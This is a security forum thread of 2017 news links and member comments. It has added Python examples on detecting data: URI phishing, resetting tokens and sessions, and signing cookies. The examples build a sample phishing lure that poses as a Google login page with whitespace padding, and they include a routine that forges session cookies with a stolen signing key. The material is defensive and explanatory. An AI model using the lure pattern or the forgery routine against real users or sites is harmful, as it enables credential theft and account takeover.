https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/
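The technique in the Wordfence write-up works because the address bar reads something like `data:text/html,https://accounts.google.com/ServiceLogin?...`: the user sees the Google host name, but the scheme is `data:`, so nothing was fetched from Google and the whole login page is inline HTML. As an added example (not from the article), this helper classifies a string as seen in the location bar or in a proxy/mail log; the regex, verdict names and the whitespace-padding check are my assumptions:

```python
"""Added example: flag data: URIs that carry a look-alike host in their payload."""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Something that reads like an https origin inside the inline payload.
_HOSTLIKE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def classify_address(address):
    """Return (verdict, details) for a string seen in the location bar."""
    s = address.strip()
    scheme, sep, rest = s.partition(":")
    scheme = scheme.lower()
    if not sep:
        return ("unknown", {"origin": None})

    if scheme == "data":
        # data:[<mediatype>][;base64],<payload>  -- the payload IS the page.
        head, _, payload = rest.partition(",")
        media = head.split(";")[0] or "text/plain"
        is_b64 = "base64" in head.lower()
        text = payload
        if is_b64:
            try:
                raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
                text = raw.decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                text = payload          # malformed: inspect the raw payload
        text = unquote(text)
        spoofed = _HOSTLIKE.search(text)
        # Long whitespace runs push the real markup out of the visible bar
        # (assumed trait of this kind of lure, not a hard rule).
        padded = bool(re.search(r"\s{20,}", text))
        verdict = "phishing_suspect" if spoofed else "data_uri"
        return (verdict, {
            "mediatype": media,
            "base64": is_b64,
            "spoofed_host": spoofed.group(1).lower() if spoofed else None,
            "padded": padded,
            "origin": None,             # data: URIs have an opaque origin
        })

    parts = urlsplit(s)
    if scheme in ("http", "https") and parts.hostname:
        return ("ok", {"origin": f"{scheme}://{parts.hostname}"})
    return ("unknown", {"origin": None})


if __name__ == "__main__":
    # Constructed lure in the shape the article describes.
    lure = ("data:text/html,https://accounts.google.com/ServiceLogin?service=mail"
            + " " * 200 + "<script>/* inline phishing page */</script>")
    print(classify_address(lure))
    print(classify_address("https://accounts.google.com/ServiceLogin?service=mail"))
```

The lesson for users is the first characters of the bar, not the middle: a real login page has `https://` first and the site's host immediately after it.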
-
What the Most Common Passwords of 2016 List Reveals
https://blog.keepersecurity.com/2017/01/13/most-common-passwords-of-2016-research-study/
And the winner is 123456 ::)
wonder how many avast accounts that use it?
-
What the Most Common Passwords of 2016 List Reveals
https://blog.keepersecurity.com/2017/01/13/most-common-passwords-of-2016-research-study/
And the winner is 123456 ::)
wonder how many avast accounts that use it?
God that is an easy one, should have used 12345678, much harder to crack :D
-
Unbreakable Locky ransomware is on the march again
http://www.theregister.co.uk/2017/01/20/locky_ransomware_horrorshow_returns/
-
HP recalls lots of laptop batteries due to the hazard they pose.
Be sure to check your batteries if your laptop is from HP.
http://www.makeuseof.com/tag/hp-recalls-laptop-batteries-check-now/
http://www.digitaltrends.com/computing/hp-battery-recall-expansion/
-
[ALERT] USB Sticks Could Infect Your Network With New Spora Ransomware Worm
https://community.spiceworks.com/topic/1958926-alert-usb-sticks-could-infect-your-network-with-new-spora-ransomware-worm
-
Former Mozilla Engineer: Your Antivirus Is Poison, Remove It Now
http://news.softpedia.com/news/former-mozilla-engineer-your-antivirus-is-poison-remove-it-now-512300.shtml
I totally disagree.
-
Former Mozilla Engineer: Your Antivirus Is Poison, Remove It Now
http://news.softpedia.com/news/former-mozilla-engineer-your-antivirus-is-poison-remove-it-now-512300.shtml
I totally disagree.
Well this shows his level of knowledge of other AVs or the various AV tests.
He says Windows Defender is a “competent” piece of software,
Why then did avast at some point recommend installing a 3rd party AV?
-
Maybe that's why he's a former employee???
-
Maybe that's why he's a former employee???
;D 8)
-
@Asyn and @bob3160,
Maybe he is one of those former employees with 'modern' insights,
that strongly advise against the use of any anti-virus?
Yes, such folks actually exist.
A bunch of guys now want one software to do it all while just clicking on - clickerdyclick.... :D
and then they are into more sorts of realms of wishful thinking.
Let them dream on and let us stay realistic.
polonus
-
@Asyn and @bob3160,
Maybe he is one of those former employees with 'modern' insights,
that strongly advise against the use of any anti-virus?
Yes, such folks actually exist.
A bunch of guys now want one software to do it all while just clicking on - clickerdyclick.... :D
and then they are into more sorts of realms of wishful thinking.
Let them dream on and let us stay realistic.
polonus
The problem is that these kinds of misguided souls always pick up a following.
This is another one of those stupid questions I often have to answer.
-
Flaws in NAS Firmware Expose Users to ‘Massive Compromise'
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1846920?p_p_auth=n5Aruqhu
-
Data is the ‘New Oil' and Everyone Needs to know what they're Leaking
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1863508?p_p_auth=n5Aruqhu
-
Content Injection Vulnerability in WordPress
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
-
https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims
Appears melding of avast and avg together is now coming to fruition as we are now seeing anti-malware tools avast has not had before?
-
https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims
Appears melding of avast and avg together is now coming to fruition as we are now seeing anti-malware tools avast has not had before?
They were already on those decryption tools before the merge. To the same end they were trying to improve the ransomware detections, but anything is welcome.
-
Microsoft Windows SMB Tree Connect Response memory corruption vulnerability
http://www.kb.cert.org/vuls/id/867968
-
Locky Ransomware, Kovter Click-Fraud Malware Spreading in Same Campaigns
https://threatpost.com/locky-ransomware-kovter-click-fraud-malware-spreading-in-same-campaigns/123560/
-
Questioning the validity of AV-test results: http://robert.ocallahan.org/2017/01/a-followup-about-av-test-reports.html
polonus
-
Questioning the validity of AV-test results: http://robert.ocallahan.org/2017/01/a-followup-about-av-test-reports.html
polonus
Articles like that are a way to instantly gain attention and "fame". :)
-
@bob3160,
We two know better, don't we?
Obvious from what Robert O'Callahan states is that he does not know how AV-Comparatives is testing.
Consider the small detection window and time-frame (under 20 minutes) often provided for them for the various launch-points of malware; that makes his story sound not completely based on live theater experience. Besides, AV-Comparatives is a fully independent institute and authorities make sure their research cannot be influenced by third-party interests, either benign or criminal (TÜV oversight).
In an ever-changing malware landscape, that is what you get. I.m.o. this blogger does not know what he is on about.
In my view he was never related to the security industry, etc. His 5 minutes of fame against those that are in the know.
Damian
-
Russian spy purge after suspected leaks to U.S. intelligence
http://money.cnn.com/2017/02/01/news/fsb-kaspersky-arrests/index.html
=============================================================
Russian security teams also arrested an employee of Russian internet security firm Kaspersky Lab. Ruslan Stoyanov was the head of the company's computer incidents investigation team, where he oversaw hacking investigations.
In a statement, Kaspersky said he was under investigation "for a period predating his employment at Kaspersky Lab." He had joined the company in July 2012, according to his LinkedIn profile. Kaspersky also insisted it has "no political ties to any government."
==============================================================
Hmmmm ..... not sure I trust Kaspersky
-
Now that both Net Neutrality and Privacy are dead in the water, read this interesting link how the profiling of Internet users could be used in data-driven communication. There is a lot of subtle psychology involved and it can be set to work via the hidden hand of our social media data manipulation, like facebook, whatsapp and the like.
Read: https://motherboard.vice.com/en_us/article/how-our-likes-helped-trump-win
polonus
-
Now that both Net Neutrality and Privacy are dead in the water, read this interesting link how the profiling of Internet users could be used in data-driven communication. There is a lot of subtle psychology involved and it can be set to work via the hidden hand of our social media data manipulation, like facebook, whatsapp and the like.
Read: https://motherboard.vice.com/en_us/article/how-our-likes-helped-trump-win
polonus
Privacy has been dead for a very long time. You were just pretending to hide.....
-
Hi bob3160,
Yes, and Google can be ordered to turn all of your data over to the FBI or other three-letter services for that matter; read here: http://www.reuters.com/article/us-google-usa-warrant-idUSKBN15J0ON. And what of the iCloud, when those experts that should protect your data or back-up versions aren't the super experts they always pretend to be, and carriers and cloud services only take responsibility for carrying and transporting and not for a hack or a data breach of your data in the Cloud?
As you always say. Do not share with Interwebs what you do not like to share with everyone.
Privacy and integrity is a non-existent animal....
You are rather naive when you think your pizzaweb google forms are still yours only....
but the simpletons among us do not care until it is too late.
polonus
-
It's time to realize, it's already too late. :(
-
Polish banking industry takes a serious malware hit by javascript injection from the Polish Banking Regulator (KNF),
see: https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
the present situation is being monitored: https://www.youtube.com/watch?v=0OrmAhpBhoY (in Polish)
For our Polish users that have bank accounts there, 'w kraju' (in the home country).
It is worth taking a broader look at the topic and noticing a certain pattern:
https://zaufanatrzeciastrona.pl/post/czeski-msz-porzadnie-zhakowany-polski-msz-sobie-z-atakiem-rosjan-poradzil/
and
http://www.pandasecurity.com/mediacenter/pandalabs/dangerous-malware-neutralized/
polonus (volunteer website security analyst and website error-hunter)
-
On the risks from the insider intrusion from within the organization: https://intsights.com/the-dark-webs-increasing-influence-on-insider-risk/
info credits go to: Ido Wulkan, IntSights Head of Intelligence, Herzliya, Il.
pol
-
Will the WordPress CMS ever be secure? I only would like to use it for simple websites with just plain text.
Being based on PHP (with a very questionable security status), the CMS is highly insecure.
Re: https://blog.sucuri.net/2017/02/wordpress-rest-api-vulnerability-abused-in-defacement-campaigns.html
Also interesting to read: http://unserkaiser.com/blog/2014/02/21/wordpress-password-protected-posts-feature-or-security-leak/
polonus
-
Beware of Cancer trollware, might shut down your favorite AV, too.
https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/
-
Google, Mozilla and Cloudflare complain about AV https interception: https://zakird.com/papers/https_interception.pdf
polonus
-
From those that report:
"We tested and found that the following products did not intercept TLS
connections: 360 Total, Ahnlabs V3 Internet Security, Avira AV 2016, Comodo
Internet Security, F-Secure Safe, K7 Total Security, Malwarebytes, McAfee
Internet Security, Microsoft Windows Defender, Norton Security, Panda Internet
Security 2016, Security Symantec Endpoint Protection, Tencent PC Manager,
Trend Micro Maximum Security 10, and Webroot SecureAnywhere."
pol
-
Also, if I read it correctly, Avast! was the only product not degrading the TLS / security of the connection ...
(though it had other issues mentioned later in the report)
-
Security vulnerabilities fixed in Firefox 51.0.3
https://www.mozilla.org/en-US/security/advisories/mfsa2017-04/
-
New Mac malware detected this week, based on primitive Windows techniques using Word macros
https://9to5mac.com/2017/02/09/new-mac-malware-detected-this-week-based-on-primitive-windows-techniques-using-word-macros/
-
Protecting your data at border crossing: https://www.zdziarski.com/blog/?p=6918
polonus
-
Would be interesting to see the differences and discrepancies between: https://map.norsecorp.com/#/
and the new http://tld.mcafee.com/
Especially here with Sauron attacks allegedly fitting into the new strategy of alleged Russian cyberthreats:
http://www.telegraph.co.uk/news/2017/02/12/dozens-cyber-attacks-target-heart-government-every-month-gchq/
polonus
-
What is Pharming, and (most importantly) how can you prevent it?
http://www.thewindowsclub.com/what-is-pharming
-
Big issue in Germany now over Firefox Focus collecting and transferring data:
https://www.reddit.com/r/technology/comments/5tmhf4/mozillas_firefox_focus_the_privacy_browser_is/
polonus
-
Mirai Widens Distribution with New Trojan that Scans More Ports
http://blog.trendmicro.com/trendlabs-security-intelligence/mirai-widens-distribution-new-trojan-scans-ports/
https://virustotal.com/en/file/2de4851dcaaa4b5ed8421a0c72ceed64497c147d85cbfb1928d6baf7760c0c46/analysis/
https://virustotal.com/en/file/bdad4a77b678fda8328b2fae290e525a553c490214d43df377dbeb3132879673/analysis/
https://virustotal.com/en/file/4856706c088f66965d714fe09af22ee56d84483278582ff3dd8f98bc3c5862ab/analysis/
https://virustotal.com/en/file/2d8cd23e33e56ab396960a0d426c232f6d8905e2ac5833f37c412b699135f6ce/analysis/
-
Microsoft Delays This Month’s Security Updates Due to Last-Minute Bug
http://news.softpedia.com/news/microsoft-delays-this-month-s-security-updates-due-to-last-minute-bug-512937.shtml
-
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb17-04.html
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/
Are they gonna sell your personal Ghostery data to the highest bidder now?
You were the product all the time, didn't you realize?
polonus
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/
Are they gonna sell your personal Ghostery data to the highest bidder now?
You were the product all the time, didn't you realize?
polonus
It was recently removed from the list of programs I recommend.
One more good program choosing profit over integrity. :(
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/
Are they gonna sell your personal Ghostery data to the highest bidder now?
You were the product all the time, didn't you realize?
polonus
Me, I tried it a long time ago but it conflicted with another add-on (I can't recall which) so it became history right then.
-
I would not be worried yet about Ghostery; the new company seems to have a clean track record and it's located in Germany, where privacy laws are quite good.
-
Force Flash to be updated in Chrome.
You might have updated Chrome, but your Flash Player may still have an outdated version. You are vulnerable!
You can force a Flash update by typing chrome://components in the address bar.
Look in the listing there for Adobe Flash Player and ignore Status - No Update,
but look at the version number.
Anything other than version 24.0.0.221, and you have to update immediately.
polonus
-
Force Flash to be updated in Chrome.
You might have updated Chrome, but your Flash Player may still have an outdated version. You are vulnerable!
You can force a Flash update by typing chrome://components in the address bar.
Look in the listing there for Adobe Flash Player and ignore Status - No Update,
but look at the version number.
Anything other than version 24.0.0.221, and you have to update immediately.
polonus
Unless you're blocking updates, this will auto update. It did for me:
(http://screencast-o-matic.com/screenshots/u/Lh/1487274497306-29073.png)
-
The Rise in SSL-based Threats
https://www.zscaler.com/blogs/research/rise-ssl-based-threats-1
-
75% of All Ransomware Developed by Russian-Speaking Criminals
https://www.bleepingcomputer.com/news/security/75-percent-of-all-ransomware-developed-by-russian-speaking-criminals/
-
Windows gdi32.dll heap-based out-of-bounds reads / memory disclosure in EMR_SETDIBITSTODEVICE and possibly other records
https://bugs.chromium.org/p/project-zero/issues/detail?id=992
-
New TeamSpy Malware Campaign Turns TeamViewer into Spy Tool
http://news.softpedia.com/news/new-teamspy-malware-campaign-turns-teamviewer-into-spy-tool-513115.shtml
-
Alarm bells should go off on the security and existing vulnerabilities of DNSSEC.
Some banking sites and sites of internet providers haven't got secure DNSSEC implementations, or have exploitable vulnerabilities.
Threats from DNSSEC insecurity cause spoofing and redirections (to malcode).
Check your DNSSEC here: https://dnssec-name-and-shame.com/domain
Also: https://dnssec-debugger.verisignlabs.com/ & here: http://dnsviz.net/
Extension to check websites inside the browser: DNSSEC/TLSA validator: https://www.dnssec-validator.cz/
polonus
-
Unstoppable JavaScript Attack Helps Ad Fraud, Tech Support Scams, 0-Day Attacks
https://www.bleepingcomputer.com/news/security/unstoppable-javascript-attack-helps-ad-fraud-tech-support-scams-0-day-attacks/
-
Microsoft Security Bulletin MS17-005 - Critical
Security Update for Adobe Flash Player (4010250)
https://technet.microsoft.com/library/security/ms17-005.aspx
-
Smartphone users should stay safe from QRishing scams
http://www.thewindowsclub.com/qrishing-scams-qr-code-smartphone
-
Rogue Chrome extension pushes tech support scam
https://blog.malwarebytes.com/threat-analysis/2017/02/rogue-chrome-extension-pushes-tech-support-scam/?utm_source=googleplus&utm_medium=social
Too many people just add an extension without doing the necessary research.
Just because an extension look good doesn't mean it is good.
I can't stress and/or say this enough "Look before you leap".
-
SHA1 is dead now https://shattered.it/
https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html
-
Protect yourself from "whaling" scams and "clickjacking" attacks
http://www.thewindowsclub.com/what-are-whaling-scams
http://www.thewindowsclub.com/clickjacking-attacks-prevention
-
https://bugs.chromium.org/p/project-zero/issues/detail?id=1139
https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
4.3 million websites could be affected by random information leakage; time to change passwords and set up 2FA everywhere
https://github.com/pirate/sites-using-cloudflare
-
Hi Dwarden,
When will they finally admit that the general infrastructure of bulk hosters as a rule is insecure by design?
We all, and especially here on the old continent, have been very naive to think our data were securely dealt with
and could not leak to the highest bidders. To admit this pwned, holed status is one thing,
to do something about it is another.
One fails to meet standards anywhere. Small example: when that biggest name in ketchup (name starts with H.) could not meet up with the rabbinically prescribed amount of genuine tomato extract in their ketchup product for Jerusalem, so it would lose the name ketchup for the product, that is a shame. Despite that they still go around with tinker bells in Schul'.
In the meantime you can check on what websites you leaked private data here: http://www.doesitusecloudflare.com/
As a volunteer website security analyst here and website error-hunter I see the insecurity of the general infrastructure almost every day.
When are they gonna tackle the problems, or are there some "vested interests" that would rather not see that day?
Damian
-
What many European website owners did now or will do, as I assume?
I guess a lot of American websites follow their example.
Lots of websites in Europe did or will do the following.
Research the impact for their websites.
Research suspicious logins for accounts on their site, none detected probably.
CloudFlare reverse proxy functionality de-installed.
All password reset tokens been reset.
All existing (https-)sessions have been reset.
All passwords of accounts were reset.
Password reset-link to website, mailed to users.
Migrationplan started to halt the use of CloudFlare completely.
Bye, bye CloudFlare! Extra bonus: tor users do not have to fill out captchas all the time.
When you went here earlier, you could have known: http://www.crimeflare.com/
When you have lost "trust", you have a gigantic problem how to gain it back again.
Damian
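Two of the steps in the list above, "all password reset tokens reset" and "all existing sessions reset", have a simple server-side shape. As an added example (not code from the post or from any of the sites mentioned), here is that shape written so that anything which leaked through a proxy cannot be replayed: reset tokens are random, single-use, short-lived and stored only as a hash; sessions carry generation counters, and bumping a counter invalidates every session at once. The class, names and 15-minute TTL are my assumptions, and the dicts stand in for a real database:

```python
"""Added example: hashed single-use reset tokens and generation-based
session invalidation (standard library only)."""
import hashlib
import secrets
import time

RESET_TTL = 15 * 60  # reset links die after 15 minutes (assumed policy)


def _now(now):
    return time.time() if now is None else now


class AuthStore:
    def __init__(self):
        self.global_generation = 1   # bump to kill every session at once
        self.users = {}              # user -> per-user session generation
        self.reset_tokens = {}       # sha256(token) -> (user, expires_at)
        self.sessions = {}           # session id -> (user, user_gen, global_gen)

    def add_user(self, user):
        self.users[user] = 1

    # ---- password reset tokens -------------------------------------------
    def issue_reset(self, user, now=None):
        """Mint a random token; only its hash is stored server-side."""
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        digest = hashlib.sha256(token.encode()).hexdigest()
        self.reset_tokens[digest] = (user, _now(now) + RESET_TTL)
        return token                               # goes in the e-mail only

    def consume_reset(self, token, now=None):
        """Return the user if the token is valid; it is spent either way."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self.reset_tokens.pop(digest, None)  # single use
        if entry is None:
            return None
        user, expires_at = entry
        return user if _now(now) < expires_at else None

    def revoke_all_resets(self):
        """Step "all password reset tokens reset": every outstanding link dies."""
        self.reset_tokens.clear()

    # ---- sessions ----------------------------------------------------------
    def login(self, user):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = (user, self.users[user], self.global_generation)
        return sid

    def session_user(self, sid):
        """Valid only if both generations still match what was current at issue."""
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        user, user_gen, global_gen = entry
        if user_gen != self.users[user] or global_gen != self.global_generation:
            self.sessions.pop(sid, None)           # stale: drop it on sight
            return None
        return user

    def logout_everywhere(self, user):
        """Per-account reset, e.g. right after a password change."""
        self.users[user] += 1

    def reset_all_sessions(self):
        """Step "all existing sessions reset", without touching each row."""
        self.global_generation += 1


if __name__ == "__main__":
    store = AuthStore()
    store.add_user("alice")
    sid = store.login("alice")
    print("before reset:", store.session_user(sid))   # alice
    store.reset_all_sessions()
    print("after reset:", store.session_user(sid))    # None
```

Generation counters rather than row deletion are used so the same check works when session state lives in a signed cookie or a replicated store: the counter value at issue time is what gets embedded and compared.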
-
Beware of this new Chrome “font wasn’t found” hack!
https://neosmart.net/blog/2017/beware-of-this-new-chrome-font-wasnt-found-hack/
https://www.virustotal.com/en/file/7e62a5ca20cfb5da90fe7402f413321c9ede7e230e8b4fa2f1a4e516e8ae8e34/analysis/
-
Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement
https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037
-
Database Ransomware Attackers Migrate to MySQL
https://www.infosecurity-magazine.com/news/database-ransomware-attackers/
-
Gigantic data-breach in cloudbleed with CloudPets: https://twitter.com/troyhunt/status/836320506127101953
& https://motherboard.vice.com/en_us/article/internet-of-things-teddy-bear-leaked-2-million-parent-and-kids-message-recordings
Your iAAs is as secure as the connection it takes.
When you do no longer play with your kids and communicate through an insecure app, you are in for such a fiasco.
Hold the CEO of that firm liable and fine them into bankruptcy; that should set an end to it and also warn others to pay more attention where security is concerned.
polonus
-
The latest ransomware threat: Doxware
http://www.networkworld.com/article/3174678/security/the-latest-ransomware-threat-doxware.html
-
Is your Teddy Bear hacked :o
https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
-
Dridex’s Cold War: Enter AtomBombing
The Dridex malware project continues to evolve, and 2017 is likely to be another year of change for this Trojan.
https://securityintelligence.com/dridexs-cold-war-enter-atombombing/
-
Open bug at Bluecoat has not been patched in one and a half years and now prevents Google from a TLS update: https://bugs.chromium.org/p/chromium/issues/detail?id=694593
Sounds like a flagellant's race, one step forward and two steps back. A shame really, obstructing a more secure infrastructure.
As rumours have it, the same Bluecoat bug existed inside TLS 1.2 and Bluecoat left the bug there for nine years. In digital time that is almost a century and could be qualified as a persistent hole.
polonus
-
Did you also experience this on February 24th last? We, the wife and I, experienced it on our Google Android accounts, but failed to get an explanation of why it happened. Read about it here: https://www.theregister.co.uk/2017/03/01/google_still_silent_on_mass_logout/
The disappeared explanation from Google: Google posted and then deleted a message related to the deauthentication event on its Cloud Status Dashboard.
The disappeared message, cited in various online posts on the topic, reportedly said, "To summarize; [sic] some long-lived OAuth tokens have inadvertently been invalidated."
That makes sense: token invalidation would require anyone using a Google Account-related service to login again. It also may explain the wording some people saw when asked by Google to log back in: that a change had been made to their account, although no such change was visible in the security section of their account settings.
That said, the disappearance of the dashboard post is puzzling.
Anyone to speculate what it just was that Google had to hide from us all here?
What CloudPets more now will come out of the Google hat? :o ;D ;D ;)
Failing infrastructure all around, all hands on deck, friends!
polonus (volunteer website security analyst and website error-hunter)
-
Yahoo says about 32 million accounts accessed using 'forged cookies'
http://www.reuters.com/article/us-yahoo-databreach-idUSKBN1685UY
-
Crypt0L0cker Ransomware is Back with Campaigns Targeting Europe
https://www.bleepingcomputer.com/news/security/crypt0l0cker-ransomware-is-back-with-campaigns-targeting-europe/
-
Alleged Master Keys for the Dharma Ransomware Released on BleepingComputer.com
https://www.bleepingcomputer.com/news/security/alleged-master-keys-for-the-dharma-ransomware-released-on-bleepingcomputer-com/
-
32 million Yahoo accounts hacked through cookie fraud:
https://www.sec.gov/Archives/edgar/data/1011006/000119312517065791/d293630d10k.htm
Isn't it time to let Yahoo Inc. go the way of the dinosaur?
Reputational damage that can never ever be undone.
And they missed all opportunities from the word go.
polonus
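The two posts above on Yahoo's "forged cookies" describe an attacker minting session cookies that the site accepted as genuine. As an added example (not Yahoo's design, which the filing does not describe in this detail), this is the minimal signed-cookie scheme such an attack targets: the cookie is `user|expiry|keyid|mac` with an HMAC-SHA256 over the first three fields under a server key. Forging one requires that key, so a leak of signing keys is fatal until they are rotated and the old key id is refused; the class, cookie layout and key ids are my assumptions:

```python
"""Added example: HMAC-signed session cookies, forgery with a stolen key,
and the key rotation that kills the forged cookies."""
import hashlib
import hmac
import time


def _now(now):
    return time.time() if now is None else now


def _mac(secret, body):
    return hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()


class CookieSigner:
    def __init__(self, keys, current):
        self.keys = dict(keys)      # key id -> secret bytes; old ids kept only during grace
        self.current = current      # key id used for newly issued cookies

    def issue(self, user, ttl, now=None):
        """Return user|expiry|keyid|mac (user must not contain '|')."""
        body = f"{user}|{int(_now(now) + ttl)}|{self.current}"
        return f"{body}|{_mac(self.keys[self.current], body)}"

    def verify(self, cookie, now=None):
        """Return the user if the MAC checks out under a still-trusted key."""
        try:
            user, exp, keyid, mac = cookie.split("|")
            exp = int(exp)
        except ValueError:
            return None
        secret = self.keys.get(keyid)
        if secret is None:                     # retired key id: cookie is dead
            return None
        expected = _mac(secret, f"{user}|{exp}|{keyid}")
        if not hmac.compare_digest(mac, expected):   # constant-time compare
            return None
        return user if _now(now) < exp else None

    def rotate(self, new_keyid, secret, retire=()):
        """Add a fresh key and drop the listed old ones (and every cookie signed by them)."""
        self.keys[new_keyid] = secret
        for k in retire:
            self.keys.pop(k, None)
        self.current = new_keyid


def forge_with_stolen_key(secret, keyid, user, expiry):
    """What the attacker does once the signing key has leaked."""
    body = f"{user}|{expiry}|{keyid}"
    return f"{body}|{_mac(secret, body)}"


if __name__ == "__main__":
    signer = CookieSigner({"k1": b"constructed-secret-one"}, "k1")
    forged = forge_with_stolen_key(b"constructed-secret-one", "k1", "admin", 9999999999)
    print("forged cookie accepted:", signer.verify(forged))          # admin
    signer.rotate("k2", b"constructed-secret-two", retire=["k1"])
    print("after rotation:", signer.verify(forged))                 # None
```

Rotation only helps if the old key id is actually retired; keeping it "for compatibility" keeps every forged cookie alive too.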
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an insecure Yahoo have to offer that makes it irreplaceable by something more secure ???
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
-
Security slip-ups in 1Password and other password managers 'extremely worrying'
https://www.theregister.co.uk/2017/02/28/flaws_in_password_management_apps/
This is why I have my passwords stored in my head ;D
!! Update 2017-03-01: All reported vulnerabilities are fixed by the vendors !!
https://team-sik.org/trent_portfolio/password-manager-apps/
-
CVE-2016-9892 - Remote Code Execution as Root via ESET Endpoint Antivirus 6
Product: ESET Endpoint Antivirus 6 for macOS > http://seclists.org/fulldisclosure/2017/Feb/68
-
Decryption Tools for Dharma Ransomware Variants are Now Available
http://news.softpedia.com/news/decryption-tools-for-dharma-ransomware-variants-are-now-available-513508.shtml
-
The weakest link online often comes in the form of human interference: https://aws.amazon.com/message/41926/
Amazon now will look for ways to faster restore s3-sub systems whenever there is trouble with the cloud.
polonus
-
A way to avoid a so-called fat finger disaster as happened at amazon's:
• Give in a particular command;
• Then do as we write it here and lift your fingers completely from the keyboard;
• Have a hard look at that command again;
• When at a second glance the command looks fine, ENTER.
This procedure has helped to prevent many a disaster, but it does not stop all tragedies ...
Quote info credits go to MvdJong
polonus
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an insecure Yahoo have to offer that makes it irreplaceable by something more secure ???
Bob, by the time the breach went public it was too late to do anything but take note and take extra security precautions.
Also, since the breach(es) Yahoo has taken steps to secure users' accounts. Don't forget Google has been breached
in the past. I have had to change my Google password more than I have had to with Yahoo in the last 8 years. Google,
like Yahoo, also had to change their culture. I know about Google's breach because Google has sent me several emails
warning me about account breaches.
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an insecure Yahoo have to offer that makes it irreplaceable by something more secure ???
Bob, by the time the breach went public it was too late to do anything but take note and take extra security precautions.
Also, since the breach(es) Yahoo has taken steps to secure users' accounts. Don't forget Google has been breached
in the past. I have had to change my Google password more than I have had to with Yahoo in the last 8 years. Google,
like Yahoo, also had to change their culture. I know about Google's breach because Google has sent me several emails
warning me about account breaches.
Yahoo was just hacked again. :)
-
If you are referring to the most recent article, it's about a breach that happened about a year ago before more strict encryption was in place.
Since Yahoo put harder encryption methods in place no new breach has been reported. I'm sticking with Yahoo.
BTW, I also have Google and MSN accounts. I just prefer Yahoo (lots of services) except for my default search engine Google.
-
Your computer, your choice. :)
-
Spammers leak data of 1.4 billion e-mail accounts:
https://mackeeper.com/blog/post/339-spammergate-the-fall-of-an-empire
These spammers are good for sending 1 billion spam mails a day. :o
polonus
-
SQL Injection Vulnerability in NextGEN Gallery for WordPress
https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html
-
@Bob
I just received another alert from Yahoo concerning another breach which occurred just before stricter encryption was put into place.
I might be stubborn, but I'm sticking with Yahoo. And, I'm guessing, so are a lot of other forum members.
-
@Bob
I just received another alert from Yahoo concerning another breach which occurred just before stricter encryption was put into place.
I might be stubborn, but I'm sticking with Yahoo. And, I'm guessing, so are a lot of other forum members.
https://forum.avast.com/index.php?topic=52252.msg1374848#msg1374848 :)
-
WordPress 4.7.3 Security and Maintenance Release
https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
The question is why Avast! and AVG are still separate and not one product; it would be 25+% then.
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
The question is why Avast! and AVG are still separate and not one product; it would be 25+% then.
Primarily because you still have both brands out there.
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
